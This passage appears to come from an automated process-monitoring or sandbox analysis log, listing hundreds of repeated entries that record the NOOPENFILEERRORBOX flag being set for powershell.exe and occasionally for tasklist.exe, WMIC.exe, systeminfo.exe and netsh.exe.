              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
